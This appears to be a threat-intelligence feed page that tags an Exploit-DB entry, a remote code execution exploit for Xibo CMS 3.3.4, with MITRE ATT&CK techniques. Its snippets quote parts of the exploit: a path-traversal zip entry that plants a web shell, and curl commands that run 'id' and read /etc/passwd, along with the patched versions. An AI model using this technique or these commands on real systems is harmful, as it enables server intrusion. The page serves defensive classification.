TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Exploit-DB

[webapps] xibocms 3.3.4 - RCE

2026-04-08 · Read original ↗

ATT&CK techniques detected

5 predictions
T1190Exploit Public-Facing Application
94%
“[ webapps ] xibocms 3. 3. 4 - rce xibocms 3. 3. 4 - rce # exploit title : xibocms 3. 3. 4 - remote code execution # google dork : n / a # date : 2025 - 11 - 18 # exploit author : complexusprada # vendor homepage : https : / / xibo. org. uk / # software link : https : / / github. …”
T1190Exploit Public-Facing Application
81%
“: http : / / < target > / shell. php? cmd = < command > # example : curl ' http : / / target / shell. php? cmd = id ' # mitigation : # upgrade to patched versions : # - xibo cms 2. 3. 17 + ( for 2. x branch ) # - xibo cms 3. 3. 5 + ( for 3. x branch ) # disclaimer : # this exploi…”
T1068Exploitation for Privilege Escalation
47%
“cmd = < command > " ) print ( " \ n [ * ] example : " ) print ( " curl ' http : / / target / shell. php? cmd = id ' " ) print ( " curl ' http : / / target / shell. php? cmd = cat % 20 / etc / passwd ' " ) print ( ) except exception as e : print ( f " [ - ] error creating exploit …”
T1190Exploit Public-Facing Application
45%
“##tr ( ' mapping. json ', json. dumps ( mapping _ json ) ) # critical : the file path in the zip must match what xibo expects # xibo calls : $ zip - > getstream ( ' library / '. $ file [ ' file ' ] ) # therefore we place the file at : library /.. /.. / web / shell. php zf. writes…”
T1505.003Web Shell
34%
“: ".. /.. / web / shell. php ",... } # xibo reads : library / +.. /.. / web / shell. php # xibo writes : / var / www / cms / library / temp / +.. /.. / web / shell. php # result : / var / www / cms / web / shell. php ( webshell in web root! ) # prerequisites : # - valid xibo cms …”

Summary

xibocms 3.3.4 - RCE